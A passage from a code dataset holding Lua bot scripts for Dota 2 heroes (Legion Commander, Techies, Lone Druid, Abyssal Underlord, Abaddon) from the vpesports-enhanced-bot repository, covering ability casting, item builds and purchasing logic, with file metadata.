ally:GetHealth() < shield_target:GetHealth() 
and (ally:GetHealth()*1.5 < botHP or ally:GetHealth() < 500 ) then\n                shield_target = ally\n            end\n        end\n\n        if press:GetLevel() == 1 then\n            if shield_target_health < 200 and #nearbyEnemies_675 > 0 then\n                shield_cast = true\n            end\n        else\n            if botMode == BOT_MODE_RETREAT or botMode == BOT_MODE_ATTACK and numEnemies > 0 then\n                shield_cast = true\n            else\n                for j,enemy in pairs(enemies) do\n                    if enemy:GetAttackTarget() == npcBot and botHP < botMaxHP - 150 then\n                        shield_cast = true\n                        break\n                    end\n                end\n            end\n        end\n\n        -- Press cast --\n        if shield_cast and not npcBot:HasModifier(\"modifier_fountain_aura_buff\") then\n            print(\"Use Shield on \" .. tostring(shield_target:GetUnitName()))\n            npcBot:Action_UseAbilityOnEntity(press, shield_target)\n        end\n    end\n\t\n\t-- DUEL Usage\n\tif duel:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tlocal target = nil\n\t\t\n\t\tlocal botHP = npcBot:GetHealth()\n\t\tlocal botArmor = npcBot:GetArmor()\n\t\tlocal botAttack = npcBot:GetAttackDamage()\n\t\tlocal botMult = getArmorMultiplier(botArmor)\n\t\tlocal botDamage = botAttack * botMult\n\t\t\n\t\tlocal botKill = 0\n\t\tlocal enemyKill = 5000\n\t\t\n\t\tfor e = 1, numEnemies do\n\t\t\tlocal enemy = enemies[e]\n\t\t\t\n--\t\t\tif enemy ~= nil then\n--\t\t\t\tlocal hp = enemy:GetHealth()\n--\t\t\t\tlocal armor = enemy:GetArmor()\n--\t\t\t\tlocal attack = enemy:GetEvasion()\n--\t\t\t\tlocal multiplier = getArmorMultiplier(armor)\n--\t\t\t\tlocal damage = attack * multiplier\n--\t\t\t\tlocal toKillBot = botHP / damage\n--\t\t\t\tlocal toKillEnemy = hp / botDamage\n--\t\t\t\t\n--\t\t\t\tif botKill < toKillBot and enemyKill > toKillEnemy then\n\t\t\t\t\ttarget = enemy\n--\t\t\t\tend\n--\t\t\tend\n\t\tend\n\t\t\n\t\tif target ~= nil then\n            local blinkLoc = npcBot:FindItemSlot(\"item_blink\")\n            local blink = nil\n            if npcBot:GetItemSlotType(blinkLoc) == ITEM_SLOT_TYPE_MAIN then\n                blink = npcBot:GetItemInSlot(blinkLoc)\n            end\n            \n            npcBot.duel = true\n            npcBot.target = target\n            print(\"Dueling: \" .. 
target:GetUnitName())\n            if blink ~= nil and not npcBot.blink then\n            \tnpcBot:ActionQueue_UseAbilityOnLocation(blink, target:GetLocation())\n            \tnpcBot.blink = true\n            end\n            if npcBot.duel then\n\t\t\t\tnpcBot:ActionQueue_UseAbilityOnEntity(duel, target)\n\t\t\tend\n\t\telseif target == nil or npcBot:HasModifier(\"modifier_legion_commander_duel\") then\n\t\t\tnpcBot.duel = false\n\t\t\tnpcBot.target = nil\n\t\t\tnpcBot.blink = false\n\t\t\tnpcBot.press = false\n\t\tend\n\tend\n\t\n\t-- PRESS THE ATTACK during Duel\n\tif npcBot.duel and npcBot.target ~= nil and press:IsFullyCastable() then\n\t\tlocal targetDist = GetUnitToUnitDistance(npcBot, npcBot.target)\n\t\tlocal blinkLoc = npcBot:FindItemSlot(\"item_blink\")\n        local blink = nil\n        if npcBot:GetItemSlotType(blinkLoc) == ITEM_SLOT_TYPE_MAIN then\n            blink = npcBot:GetItemInSlot(blinkLoc)\n        end\n\t\t\n\t\tif (targetDist <= 250 or blink ~= nil) and not npcBot.press then\n\t\t\tnpcBot:ActionPush_UseAbilityOnEntity(press, npcBot)\n\t\t\tnpcBot.press = true\n\t\tend\n\tend\n\t\n    if (mode == BOT_MODE_ATTACK \n        or mode == BOT_MODE_RETREAT \n        or mode == BOT_MODE_EVASIVE_MANEUVERS) then\n        local wandSlot = npcBot:FindItemSlot(\"item_magic_wand\")\n        local wand = nil\n        if npcBot:GetItemSlotType(wandSlot) == ITEM_SLOT_TYPE_MAIN then\n            wand = npcBot:GetItemInSlot(wandSlot)\n        end\n        if wand ~= nil and (wand:GetCurrentCharges() > 10 or botHP < 100 or botMana < 100) then\n            if wand:IsFullyCastable() then\n                npcBot:Action_UseAbility(wand)\n            end\n        end\n    end\nend\n\nfunction useSoulRing()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botHP = npcBot:GetHealth()\n\t-- SOUL RING Usage\n    local soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n    local soul = nil\n    if npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n        soul = npcBot:GetItemInSlot(soulLoc)\n    end\n    if soul ~= nil then\n        if soul:IsFullyCastable() and botMana < 200 and botHP > 400 then\n            npcBot:Action_UseAbility(soul)\n        end\n    end\nend\n\nfunction getArmorMultiplier(armor)\n\treturn 1 - (0.05 * armor / (1 + 0.05 * math.abs(armor)))\nend\n\nfunction BuybackUsageThink()\n    if DotaTime() < -30 and lane_claim then\n        local lane_id = npcBot:GetAssignedLane()\n        if lane_id == 1 then\n            npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n        elseif lane_id == 2 then\n            npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n        elseif lane_id == 3 then\n            npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n        end\n        lane_claim = false\n    end\n    return\nend\n"
},
{
"alpha_fraction": 0.7012647390365601,
"alphanum_fraction": 0.7034452557563782,
"avg_line_length": 34,
"blob_id": "267caabcee92d4d808255d89cf98adf37abc6e89",
"content_id": "c5a0c3c9d5d1eb2ded78d60ead3b3ef76de425cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 4586,
"license_type": "no_license",
"max_line_length": 243,
"num_lines": 131,
"path": "/item_purchase_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\n\nlocal purchase = require(GetScriptDirectory() .. \"/item_build_techies\");\n\nlocal itemsPurchase = purchase[\"items\"]\nlocal boughtClarity = false\nlocal boughtSalve = false\nlocal clarityCount = 0\n\nfunction ItemPurchaseThink()\n--\tif GetGameState() ~= GAME_STATE_PRE_GAME and GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS then\n--\t\treturn;\n--\tend\n\t\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\t\n\tlocal clarity = nil\n\tlocal bottle = nil\n\tlocal salve = nil\n\tlocal boots = nil\n\tlocal arcane = nil\n\t\n\tlocal clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal salveLoc = npcBot:FindItemSlot(\"item_salve\")\n\tlocal bootsLoc = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal arcaneLoc = npcBot:FindItemSlot(\"item_arcane_boots\")\n\t\n\tif npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n\tend\n\tif npcBot:GetItemSlotType(bottleLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\tend\n\tif npcBot:GetItemSlotType(salveLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsalve = npcBot:GetItemInSlot(salveLoc)\n\tend\n\tif npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsLoc)\n\tend\n\t\n\tif npcBot:HasModifier(\"modifier_flask_healing\") then\n\t\tboughtSalve = false\n\tend\n\tif npcBot:HasModifier(\"modifier_clarity_potion\") then\n\t\tboughtClarity = false\n\tend\n\tif npcBot:GetItemSlotType(arcaneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tarcane = npcBot:GetItemInSlot(arcaneLoc)\n\tend\n\t\n\tif arcane == nil then\n \tif (botMana < npcBot:GetAbilityByName(\"techies_remote_mines\"):GetManaCost()) and npcBot:IsAlive() and arcane == nil then\n \t\tif clarityCount < 4 and not boughtClarity and (bottle == nil or bottle:GetCurrentCharges() == 0) and clarity == nil and not npcBot:HasModifier(\"modifier_clarity_potion\") and npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_INVALID then\n \t\tlocal result = npcBot:ActionImmediate_PurchaseItem(\"item_clarity\")\n \t\tif result == PURCHASE_ITEM_SUCCESS then\n \t\t\tboughtClarity = true\n \t\t\tclarityCount = clarityCount + 1\n \t\tend\n \tend\n end\n \t\n-- \tif (botHP/botMaxHP < 0.2) and npcBot:IsAlive() then\n-- \t\tif not boughtSalve and salve == nil and not npcBot:HasModifier(\"modifier_flask_healing\") then\n-- \tlocal result = npcBot:ActionImmediate_PurchaseItem(\"item_flask\")\n-- \tif result == PURCHASE_ITEM_SUCCESS then\n-- \t\tboughtSalve = true\n-- \tend\n-- \t\tend\n-- \tend\n\tend\n\n\tlocal itemIndex = nil\n\t\n\tfor i = 1, #itemsPurchase do\n\t\tif itemsPurchase[i] ~= \"none\" then\n\t\t\titemIndex = i\n\t\t\tbreak\n\t\tend\n\tend\n\t\n\tif itemIndex == nil then\n\t\treturn\n\tend\n\t\n\tlocal botGold = npcBot:GetGold()\n\tlocal itemCost = GetItemCost(itemsPurchase[itemIndex])\n\t\n\tif botGold >= itemCost then\n\t\tlocal sideShop = IsItemPurchasedFromSideShop(itemsPurchase[itemIndex])\n\t\tlocal secretShop = IsItemPurchasedFromSecretShop(itemsPurchase[itemIndex])\n\t\tlocal sideShopDistance = npcBot:DistanceFromSideShop()\n\t\tlocal secretShopDistance = npcBot:DistanceFromSecretShop()\n\t\tlocal fountainDistance = npcBot:DistanceFromFountain()\n\t\t\n\t\tif secretShop then\n\t\t\tnpcBot.secretShop = true -- lets the secret shop mode know to switch\n\t\t\tif secretShopDistance == 0 
then\n\t\t\t\tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\t\tprint(\"Purchasing \" .. itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n \t\t\tif result == PURCHASE_ITEM_SUCCESS then\n \t\t\t\titemsPurchase[itemIndex] = \"none\"\n \t\t\telse\n \t\t\t\tprint(\" Item Not Purchased: \" .. tostring(result) .. \" : \" .. tostring(itemsPurchase[itemIndex]))\n \t\t\tend\n\t\t\tend\n\t\telseif not secretShop then\n\t\t\tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\tprint(\"Purchasing \" .. itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n\t\t\tif result == PURCHASE_ITEM_SUCCESS then\n\t\t\t\titemsPurchase[itemIndex] = \"none\"\n\t\t\telse\n\t\t\t\tprint(\" Item Not Purchased: \" .. tostring(result) .. \" : \" .. tostring(itemsPurchase[itemIndex]))\n\t\t\tend\n\t\tend\n\tend\n\t\n\tif npcBot:GetStashValue() > 0 then\n\t\tlocal courier = GetCourier(0)\n\t\tlocal state = GetCourierState(courier)\n\t\t\n\t\tif courier ~= nil then\n\t\t\tif state == COURIER_STATE_IDLE or state == COURIER_STATE_AT_BASE and npcBot:IsAlive() then\n\t\t\t\tnpcBot:ActionImmediate_Courier(courier, COURIER_ACTION_TAKE_AND_TRANSFER_ITEMS)\n\t\t\tend\n\t\tend\n\tend\nend\t\n"
},
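The techies purchase script above runs the same three-step lookup (FindItemSlot, slot-type check, GetItemInSlot) once per consumable, and the other hero scripts below repeat it too. A small helper keeps one copy of that pattern; this is only a sketch against the bot API calls the scripts already use, and the name `findUsableItem` is ours, not the repo's:

```lua
-- Return the item handle if `itemName` sits in the bot's main inventory,
-- otherwise nil. Mirrors the per-item guard repeated in the script above.
local function findUsableItem(bot, itemName)
    local slot = bot:FindItemSlot(itemName)
    if bot:GetItemSlotType(slot) == ITEM_SLOT_TYPE_MAIN then
        return bot:GetItemInSlot(slot)
    end
    return nil
end

-- Usage: local clarity = findUsableItem(npcBot, "item_clarity")
```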
{
"alpha_fraction": 0.7337164878845215,
"alphanum_fraction": 0.7375478744506836,
"avg_line_length": 26.473684310913086,
"blob_id": "9855b69fc586674107a4f1c21ba9a434eaec3007",
"content_id": "b7451e99face8cb971c175a53b7f92206dba7bce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 522,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 19,
"path": "/mode_laning_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal botLocArray = {}\n\nfunction GetDesire()\n\tlocal gameTime = DotaTime()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal modeDesire = npcBot:GetActiveModeDesire()\n\tlocal aghaSlot = npcBot:FindItemSlot(\"item_ultimate_scepter\")\n\t\n\tif npcBot:GetItemSlotType(aghaSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\treturn _G.desires[1]\n\tend\n--\tprint(gameTime)\n\treturn _G.desires[6]\nend\n"
},
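The lone druid laning mode above returns entries of `_G.desires`, a table defined in UtilityData, which is not part of this listing. Purely as an assumption about its shape (the real values may differ), it is presumably a descending priority scale consumed by GetDesire:

```lua
-- Hypothetical shape of the shared desire table; the actual definition
-- lives in UtilityData and is not shown in this listing.
_G.desires = {
    0.95, -- [1] near-maximum: claim the mode (e.g. once Aghanim's is owned)
    0.80,
    0.65,
    0.50,
    0.35,
    0.25, -- [6] low: defer to the default laning behaviour
}
```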
{
"alpha_fraction": 0.5131633877754211,
"alphanum_fraction": 0.534475564956665,
"avg_line_length": 23.9375,
"blob_id": "47313c98da90c5976964c98e1bf2f26db880887c",
"content_id": "71fe06e10ce17494b2dfb70ff8c12963832e438e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2393,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 96,
"path": "/item_build_abyssal_underlord.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n -- start --\n\t\"item_stout_shield\",\n \"item_flask\",\n \"item_tango\",\n \"item_enchanted_mango\",\n -- arcane boots --\n \"item_boots\",\n \"item_energy_booster\",\n -- magic wand --\n \"item_magic_stick\",\n \"item_branches\",\n \"item_branches\",\n -- Soul Ring --\n \"item_ring_of_regen\",\n \"item_gauntlets\",\n \"item_gauntlets\",\n \"item_recipe_soul_ring\",\n -- vanguard --\n \"item_ring_of_health\",\n \"item_vitality_booster\",\n -- Hood of Defiance --\n \"item_ring_of_health\",\n \"item_cloak\",\n \"item_ring_of_regen\",\n -- Pipe of Insight --\n \"item_ring_of_regen\",\n \"item_branches\",\n \"item_recipe_headdress\",\n \"item_recipe_pipe\",\n -- Crimson Guard --\n \"item_chainmail\",\n \"item_branches\",\n \"item_recipe_buckler\",\n \"item_recipe_crimson_guard\",\n -- Mekansm --\n \"item_ring_of_regen\",\n \"item_branches\",\n \"item_recipe_headdress\",\n \"item_chainmail\",\n \"item_branches\",\n \"item_recipe_buckler\",\n \"item_recipe_mekansm\",\n -- Guardian Greaves --\n \"item_recipe_guardian_greaves\",\n -- Blink Dagger --\n \"item_blink\",\n -- Blade Mail --\n \"item_broadsword\",\n \"item_chainmail\",\n \"item_robe\",\n -- Shiva's Guard --\n \"item_platemail\",\n \"item_mystic_staff\",\n \"item_recipe_shivas_guard\",\n}\n\nlocal firestorm = \"abyssal_underlord_firestorm\"\nlocal pit_of_malice = \"abyssal_underlord_pit_of_malice\"\nlocal atrophy_aura = \"abyssal_underlord_atrophy_aura\"\nlocal dark_rift = \"abyssal_underlord_dark_rift\"\nlocal cancel_dark_rift = \"abyssal_underlord_cancel_dark_rift\"\n\nX[\"skills\"] = {\n atrophy_aura, --1\n firestorm, --2 \n firestorm, --3\n atrophy_aura, --4\n firestorm, --5\n dark_rift, --6\n firestorm, --7\n pit_of_malice, --8\n pit_of_malice, --9\n talents[3], --10\n pit_of_malice, --11\n dark_rift, --12\n pit_of_malice, --13\n atrophy_aura, --14\n talents[5], --15\n atrophy_aura, --16\n -- \"-1\", --17\n dark_rift, --18\n -- \"-1\", --19\n talents[6], --20\n -- \"-1\", \t --21\n -- \"-1\", \t --22\n -- \"-1\", --23\n -- \"-1\", --24\n talents[8], --25\n}\nreturn X"
},
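The build file above is plain data: a flat shopping list plus a skill order. One way such a list gets consumed (a minimal sketch, not the repo's actual purchase logic) is to buy the head of the list whenever gold allows and pop it, exactly as the ability files below pop the `skills` table:

```lua
-- Minimal consumption sketch for a build table like the one above.
local build = require(GetScriptDirectory() .. "/item_build_abyssal_underlord")
local items = build["items"]

function ItemPurchaseThink()
    local bot = GetBot()
    if items[1] ~= nil and bot:GetGold() >= GetItemCost(items[1]) then
        -- Pop the head of the list only once the purchase succeeded.
        if bot:ActionImmediate_PurchaseItem(items[1]) == PURCHASE_ITEM_SUCCESS then
            table.remove(items, 1)
        end
    end
end
```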
{
"alpha_fraction": 0.5389426350593567,
"alphanum_fraction": 0.5486157536506653,
"avg_line_length": 38.58085632324219,
"blob_id": "5d464e04bcd69880376f0a33c94654b23be65d91",
"content_id": "f620e7b96a9b373133fc278e0498a27f7fe48c2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 11992,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 303,
"path": "/ability_item_usage_abaddon.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_abaddon\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\nlocal UnderDarkRift = false\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n -- for i, item in pairs(skillsToLevel) do\n -- print(i, item)\n -- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n -- print(npcBot:GetAbilityPoints(), skillsToLevel[1])\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local botMaxHealth = npcBot:GetMaxHealth()\n local botMaxMana = npcBot:GetMaxMana()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n local action_mode = npcBot:GetActiveMode()\n\n local death_coil = npcBot:GetAbilityByName(\"abaddon_death_coil\")\n local aphotic_shield = npcBot:GetAbilityByName(\"abaddon_aphotic_shield\")\n\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n local nearbyEnemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\n -- death coil think --\n ---- suicide death coil ----\n if death_coil:IsFullyCastable() then\n local coil_cast = false\n local coil_target = nil\n healthCost = death_coil:GetLevel()*25 + 50\n if botHealth < healthCost and #nearbyEnemies > 0 then\n local nearbyEnemies_800 = npcBot:GetNearbyHeroes(800, true, BOT_MODE_NONE)\n for j, enemy in pairs(nearbyEnemies_800) do\n if coil_target == nil then\n coil_target = enemy\n else\n if enemy:GetHealth() < coil_target:GetHealth() then\n coil_target = enemy\n end\n end\n end\n if coil_target == nil then\n local nearbyAllies_800 = npcBot:GetNearbyHeroes(800, false, BOT_MODE_NONE)\n for j, ally in pairs(nearbyAllies_800) do\n if coil_target == nil then\n coil_target = ally\n else\n if ally:GetHealth() < coil_target:GetHealth() then\n coil_target = ally\n end\n end\n end\n end\n if coil_target == nil then\n local nearbyCreeps_800 = npcBot:GetNearbyLaneCreeps(800, true)\n for j, creep in pairs(nearbyCreeps_800) do\n if coil_target == nil then\n coil_target = creep\n else\n if creep:GetHealth() < coil_target:GetHealth() then\n coil_target = creep\n end\n end\n end\n end\n if coil_target == nil then\n local nearbyCreeps_800 = npcBot:GetNearbyLaneCreeps(800, false)\n for j, creep in pairs(nearbyCreeps_800) do\n if coil_target == nil then\n coil_target = creep\n else\n if creep:GetHealth() < coil_target:GetHealth() then\n coil_target = creep\n end\n end\n end\n end\n if coil_target ~= nil then\n coil_cast = true\n end\n end\n ---- common death coil think ----\n if not coil_cast then\n if not npcBot:IsChanneling() then\n coil_damage = death_coil:GetAbilityDamage()\n for j, enemy in pairs(nearbyEnemies) do\n if coil_target == nil then\n coil_target = enemy\n else\n local enemyResist = enemy:GetMagicResist()\n local enemy_coil_damage = coil_damage*(1-enemyResist)\n if enemy:GetHealth() < enemy_coil_damage then\n coil_target = enemy\n coil_cast = true\n break\n elseif enemy:GetHealth() < coil_target:GetHealth() then\n coil_target = enemy\n end\n end\n 
end\n                if not coil_cast then\n                    local nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n                    for j, ally in pairs(nearbyAllies) do\n                        if (coil_target == nil or ally:GetHealth() < coil_target:GetHealth()) and ally:GetHealth() < 500 then\n                            coil_target = ally\n                        end\n                    end\n                end\n                if (action_mode == BOT_MODE_LANING or action_mode == BOT_MODE_FARM or action_mode == BOT_MODE_PUSH_TOWER_TOP\n                    or action_mode == BOT_MODE_PUSH_TOWER_MID or action_mode == BOT_MODE_PUSH_TOWER_BOT) then\n                    if coil_target == nil then\n                        local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n                        for j, creep in pairs(nearbyCreeps) do\n                            local creepResist = creep:GetMagicResist()\n                            local creep_coil_damage = coil_damage*(1-creepResist)\n                            if creep:GetHealth() < creep_coil_damage then\n                                coil_target = creep\n                                break\n                            end\n                        end\n                    end\n                end\n                if not coil_cast and coil_target ~= nil and coil_target ~= npcBot then\n                    if botHealth > 500 and #nearbyEnemies > 0 then\n                        coil_cast = true\n                    end\n                end\n            end\n        end\n\n        ---- death coil cast ----\n        if coil_cast then\n            print(\"Use Coil on \", coil_target:GetUnitName())\n            npcBot:Action_UseAbilityOnEntity(death_coil, coil_target)\n        end\n    end\n\n    -- aphotic shield --\n    if aphotic_shield:IsFullyCastable() then\n        local shield_cast = false\n        local shield_target = npcBot\n        local shield_target_health = npcBot:GetHealth()\n        local nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n        local nearbyEnemies_675 = npcBot:GetNearbyHeroes(675, true, BOT_MODE_NONE)\n        for j, ally in pairs(nearbyAllies) do\n            if ally:GetHealth() < shield_target:GetHealth() and (ally:GetHealth()*1.5 < botHealth or ally:GetHealth() < 500 ) then\n                shield_target = ally\n            end\n        end\n\n        if aphotic_shield:GetLevel() == 1 then\n            if shield_target_health < 200 and #nearbyEnemies_675 > 0 then\n                shield_cast = true\n            end\n        else\n            if (action_mode == BOT_MODE_RETREAT or action_mode == BOT_MODE_ATTACK) and #nearbyEnemies > 0 then\n                shield_cast = true\n            else\n                for j,enemy in pairs(nearbyEnemies) do\n                    if enemy:GetAttackTarget() == npcBot and botHealth < botMaxHealth - 150 then\n                        shield_cast = true\n                        break\n                    end\n                end\n            end\n        end\n\n        ---- aphotic shield cast ----\n        if shield_cast and not npcBot:HasModifier(\"modifier_fountain_aura_buff\") then\n            print(\"Use Shield on \", shield_target:GetUnitName())\n            npcBot:Action_UseAbilityOnEntity(aphotic_shield, shield_target)\n        end\n    end\n\n    -- Hood of Defiance --\n    if (action_mode == BOT_MODE_ATTACK \n        or action_mode == BOT_MODE_RETREAT \n        or action_mode == BOT_MODE_DEFEND_ALLY\n        or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n        local hoodSlot = npcBot:FindItemSlot(\"item_hood_of_defiance\")\n        local hood = nil\n        if npcBot:GetItemSlotType(hoodSlot) == ITEM_SLOT_TYPE_MAIN then\n            hood = npcBot:GetItemInSlot(hoodSlot)\n        end\n        if hood ~= nil then\n            if hood:IsFullyCastable() then\n                npcBot:Action_UseAbility(hood)\n            end\n        end\n    end\n\n    -- Pipe of Insight --\n    if (action_mode == BOT_MODE_ATTACK \n        or action_mode == BOT_MODE_RETREAT \n        or action_mode == BOT_MODE_DEFEND_ALLY\n        or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n        local pipeSlot = npcBot:FindItemSlot(\"item_pipe\")\n        local pipe = nil\n        if npcBot:GetItemSlotType(pipeSlot) == ITEM_SLOT_TYPE_MAIN then\n            pipe = npcBot:GetItemInSlot(pipeSlot)\n        end\n        if pipe ~= nil then\n            if pipe:IsFullyCastable() then\n                npcBot:Action_UseAbility(pipe)\n            end\n        end\n    end\n\n    -- Shiva's Guard --\n    if (action_mode == BOT_MODE_ATTACK \n        or action_mode == BOT_MODE_RETREAT \n        or action_mode == BOT_MODE_DEFEND_ALLY\n        or action_mode == 
BOT_MODE_EVASIVE_MANEUVERS) then\n local shivaSlot = npcBot:FindItemSlot(\"item_shivas_guard\")\n local shiva = nil\n if npcBot:GetItemSlotType(shivaSlot) == ITEM_SLOT_TYPE_MAIN then\n shiva = npcBot:GetItemInSlot(shivaSlot)\n end\n if shiva ~= nil then\n if shiva:IsFullyCastable() then\n npcBot:Action_UseAbility(shiva)\n end\n end\n end\n\n -- magic wand --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local wandSlot = npcBot:FindItemSlot(\"item_magic_wand\")\n local wand = nil\n if npcBot:GetItemSlotType(wandSlot) == ITEM_SLOT_TYPE_MAIN then\n wand = npcBot:GetItemInSlot(wandSlot)\n end\n if wand ~= nil and (wand:GetCurrentCharges() > 10 or botHealth < 100 or botMana < 100) then\n if wand:IsFullyCastable() then\n npcBot:Action_UseAbility(wand)\n end\n end\n end\n\n -- Medallion of Courage --\n if npcBot:GetAttackTarget() ~= nil then\n local medallionSlot = npcBot:FindItemSlot(\"item_medallion_of_courage\")\n local medallion = nil\n if npcBot:GetItemSlotType(medallionSlot) == ITEM_SLOT_TYPE_MAIN then\n medallion = npcBot:GetItemInSlot(medallionSlot)\n end\n if medallion ~= nil then\n if medallion:IsFullyCastable() then\n npcBot:Action_UseAbilityOnEntity(medallion, npcBot:GetAttackTarget())\n end\n end\n end\n\n -- Solar Crest --\n if npcBot:GetAttackTarget() ~= nil then\n local solarCrestSlot = npcBot:FindItemSlot(\"item_solar_crest\")\n local solarCrest = nil\n if npcBot:GetItemSlotType(solarCrestSlot) == ITEM_SLOT_TYPE_MAIN then\n solarCrest = npcBot:GetItemInSlot(solarCrestSlot)\n end\n if solarCrest ~= nil then\n if solarCrest:IsFullyCastable() then\n npcBot:Action_UseAbilityOnEntity(solarCrest, npcBot:GetAttackTarget())\n end\n end\n end\n\nend\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend"
},
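The Abaddon script above repeats the same "keep the lowest-health unit" fold for enemy heroes, allied heroes, and two creep lists. A generic helper (our naming, a sketch built only on the handle methods the script already calls) collapses those four loops:

```lua
-- Fold a unit list into the lowest-health candidate, seeded with `current`
-- so several lists can be scanned in sequence.
local function lowestHealthUnit(units, current)
    local best = current
    for _, unit in pairs(units) do
        if best == nil or unit:GetHealth() < best:GetHealth() then
            best = unit
        end
    end
    return best
end

-- e.g. coil_target = lowestHealthUnit(npcBot:GetNearbyHeroes(800, true, BOT_MODE_NONE), nil)
```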
{
"alpha_fraction": 0.690130889415741,
"alphanum_fraction": 0.7005659937858582,
"avg_line_length": 38.67719268798828,
"blob_id": "01a6e4de64b80d0f30353c21c5b3acecc8f42559",
"content_id": "d16d7c1b46e1d4b463836053cb158b34ca4a1d5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 11308,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 285,
"path": "/ability_item_usage_ogre_magi.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
